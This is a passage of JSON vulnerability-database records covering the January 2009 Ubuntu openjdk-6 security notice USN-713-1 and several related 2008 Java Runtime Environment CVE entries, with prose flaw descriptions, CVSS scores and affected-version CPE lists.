7c32c7c800f01a2dc1ae878eceade91d\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 25175260 a09637fa2629b9ffa58d932078a44d67\r\n http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.1_sparc.deb\r\n Size/MD5: 232954 17e8a53c99ea3ac34c0018b2e60a2be8\r\n", "edition": 1, "modified": "2009-01-31T00:00:00", "published": "2009-01-31T00:00:00", "id": "SECURITYVULNS:DOC:21257", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21257", "title": "[USN-713-1] openjdk-6 vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:27:03", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5360", "CVE-2008-5358", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "It was discovered that Java did not correctly handle untrusted applets. \nIf a user were tricked into running a malicious applet, a remote attacker \ncould gain user privileges, or list directory contents. (CVE-2008-5347, \nCVE-2008-5350)\n\nIt was discovered that Kerberos authentication and RSA public key \nprocessing were not correctly handled in Java. A remote attacker \ncould exploit these flaws to cause a denial of service. (CVE-2008-5348, \nCVE-2008-5349)\n\nIt was discovered that Java accepted UTF-8 encodings that might be \nhandled incorrectly by certain applications. A remote attacker could \nbypass string filters, possible leading to other exploits. (CVE-2008-5351)\n\nOverflows were discovered in Java JAR processing. If a user or \nautomated system were tricked into processing a malicious JAR file, \na remote attacker could crash the application, leading to a denial of \nservice. (CVE-2008-5352, CVE-2008-5354)\n\nIt was discovered that Java calendar objects were not unserialized safely. \nIf a user or automated system were tricked into processing a specially \ncrafted calendar object, a remote attacker could execute arbitrary code \nwith user privileges. (CVE-2008-5353)\n\nIt was discovered that the Java image handling code could lead to memory \ncorruption. If a user or automated system were tricked into processing \na specially crafted image, a remote attacker could crash the application, \nleading to a denial of service. (CVE-2008-5358, CVE-2008-5359)\n\nIt was discovered that temporary files created by Java had predictable \nnames. If a user or automated system were tricked into processing a \nspecially crafted JAR file, a remote attacker could overwrite sensitive \ninformation. (CVE-2008-5360)", "edition": 5, "modified": "2009-01-27T00:00:00", "published": "2009-01-27T00:00:00", "id": "USN-713-1", "href": "https://ubuntu.com/security/notices/USN-713-1", "title": "openjdk-6 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T19:28:26", "description": "Multiple unspecified vulnerabilities in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier allow untrusted applets and applications to gain privileges via vectors related to access to inner classes in the (1) JAX-WS and (2) JAXB packages.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5347", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5347"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:6", "cpe:/a:sun:jdk:6"], "id": "CVE-2008-5347", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5347", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "The \"Java Update\" feature for Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier does not verify the signature of the JRE that is downloaded, which allows remote attackers to execute arbitrary code via DNS man-in-the-middle attacks.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5355", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5355"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5355", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5355", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Unspecified vulnerability in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier, when using Kerberos authentication, allows remote attackers to cause a denial of service (OS resource consumption) via unknown vectors.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5348", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5348"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5348", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5348", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier might allow remote attackers to execute arbitrary code via a crafted GIF file that triggers memory corruption during display of the splash screen, possibly related to splashscreen.dll.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5358", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5358"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:6", "cpe:/a:sun:jdk:6"], "id": "CVE-2008-5358", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5358", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Unspecified vulnerability in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier, and JDK and JRE 5.0 Update 16 and earlier, allows remote attackers to cause a denial of service (CPU consumption) via a crafted RSA public key.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5349", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5349"], "modified": "2018-10-11T20:54:00", "cpe": ["cpe:/a:sun:jre:6", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:jdk:6"], "id": "CVE-2008-5349", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5349", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", 